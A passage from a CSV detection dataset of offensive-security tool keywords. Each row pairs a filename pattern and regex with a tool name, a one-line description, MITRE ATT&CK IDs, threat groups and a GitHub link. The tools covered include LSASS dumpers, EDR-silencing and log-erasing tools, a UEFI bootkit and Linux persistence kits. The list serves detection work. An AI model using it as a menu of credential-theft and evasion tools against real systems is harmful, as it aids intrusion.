Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*/DumpIt.exe*",".{0,1000}\/DumpIt\.exe.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","1","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*/DumpLsass.ps1*",".{0,1000}\/DumpLsass\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/dumpmethod/*.py",".{0,1000}\/dumpmethod\/.{0,1000}\.py","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*/dumpSecrets.go*",".{0,1000}\/dumpSecrets\.go.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" 
"*/dumpsecrets_test.go*",".{0,1000}\/dumpsecrets_test\.go.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*/DumpShellcode/*",".{0,1000}\/DumpShellcode\/.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*/DumpsterFire/*",".{0,1000}\/DumpsterFire\/.{0,1000}","offensive_tool_keyword","DumpsterFire","The DumpsterFire Toolset is a modular. menu-driven. cross-platform tool for building repeatable. time-delayed. distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents. distractions. and lures to support and scale their operations. Turn paper tabletop exercises into controlled live fire range events. 
Build event sequences (narratives) to simulate realistic scenarios and generate corresponding network and filesystem artifacts.","T1175 - T1176 - T1589","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/TryCatchHCF/DumpsterFire","1","0","N/A","N/A","10","967","148","2020-05-27T15:00:56Z","2017-10-05T23:44:54Z" "*/DumpThatLSASS.*",".{0,1000}\/DumpThatLSASS\..{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","1","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*/DumpThatLSASS.git*",".{0,1000}\/DumpThatLSASS\.git.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","1","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*/DumpThatLSASS/*",".{0,1000}\/DumpThatLSASS\/.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","1","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*/dumpweb.log*",".{0,1000}\/dumpweb\.log.{0,1000}","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other resources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" 
"*/dumpXor.exe*",".{0,1000}\/dumpXor\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","531","75","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*/dumpXor/dumpXor*",".{0,1000}\/dumpXor\/dumpXor.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 
- TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","531","75","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*/dunderhay/CVE-202*",".{0,1000}\/dunderhay\/CVE\-202.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/dunderhay/CVE-2020-5902","1","1","N/A","N/A","1","37","8","2024-03-19T01:21:06Z","2020-07-06T04:03:58Z" "*/duplicates.nse*",".{0,1000}\/duplicates\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/DynastyPersist.git*",".{0,1000}\/DynastyPersist\.git.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*/DynastyPersist/src/*.sh*",".{0,1000}\/DynastyPersist\/src\/.{0,1000}\.sh.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux 
persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*/e2e_commands.txt*",".{0,1000}\/e2e_commands\.txt.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/e2e_test.py*",".{0,1000}\/e2e_test\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/eap-info.nse*",".{0,1000}\/eap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ebapc_injection.exe*",".{0,1000}\/ebapc_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/Ebowla.git*",".{0,1000}\/Ebowla\.git.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","724","167","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" "*/ebowla.py*",".{0,1000}\/ebowla\.py.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","724","167","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" "*/ec2__backdoor_ec2_sec_groups*",".{0,1000}\/ec2__backdoor_ec2_sec_groups.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" 
"*/ec2__check_termination_protection*.py",".{0,1000}\/ec2__check_termination_protection.{0,1000}\.py","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/ec2__startup_shell_script/main.py*",".{0,1000}\/ec2__startup_shell_script\/main\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/ec2_public_ips_*_*.txt*",".{0,1000}\/ec2_public_ips_.{0,1000}_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/EC2Looter.py*",".{0,1000}\/EC2Looter\.py.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. 
This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","69","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" "*/echoac-poc.git*",".{0,1000}\/echoac\-poc\.git.{0,1000}","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","8","2","135","26","2024-01-09T16:44:00Z","2023-06-28T00:52:22Z" "*/edb-35948/*",".{0,1000}\/edb\-35948\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 - T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/EDD.exe",".{0,1000}\/EDD\.exe","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/EDR_Detector.git*",".{0,1000}\/EDR_Detector\.git.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","1","N/A","7","1","78","15","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z" "*/EDR_Detector.rs*",".{0,1000}\/EDR_Detector\.rs.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","1","N/A","7","1","78","15","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z" "*/EDRaser.git*",".{0,1000}\/EDRaser\.git.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "*/edraser.py*",".{0,1000}\/edraser\.py.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "*/edr-checker/*",".{0,1000}\/edr\-checker\/.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/EDRSandblast.git*",".{0,1000}\/EDRSandblast\.git.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*/EDRSandblast/*",".{0,1000}\/EDRSandblast\/.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*/EDRSilencer.c*",".{0,1000}\/EDRSilencer\.c.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","1","N/A","10","9","876","119","2024-01-24T15:52:24Z","2023-12-26T04:15:39Z" 
"*/EDRSilencer.git*",".{0,1000}\/EDRSilencer\.git.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","1","N/A","10","9","876","119","2024-01-24T15:52:24Z","2023-12-26T04:15:39Z" "*/EfiDSEFix.cpp*",".{0,1000}\/EfiDSEFix\.cpp.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*/EfiDSEFix.exe*",".{0,1000}\/EfiDSEFix\.exe.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*/EfiGuard.sln*",".{0,1000}\/EfiGuard\.sln.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*/EfiGuardDxe.c*",".{0,1000}\/EfiGuardDxe\.c.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a 
portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*/EfsPotato.git*",".{0,1000}\/EfsPotato\.git.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","674","118","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z" "*/egghunter.rb*",".{0,1000}\/egghunter\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/Egress-Assess*",".{0,1000}\/Egress\-Assess.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/elevateit.bat*",".{0,1000}\/elevateit\.bat.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*/ElevateKit/elevate.*",".{0,1000}\/ElevateKit\/elevate\..{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*/Elevator.git*",".{0,1000}\/Elevator\.git.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","1","N/A","10","6","589","68","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z" 
"*/elf/dll*",".{0,1000}\/elf\/dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/elf/exe*",".{0,1000}\/elf\/exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/ELFLoader/*",".{0,1000}\/ELFLoader\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 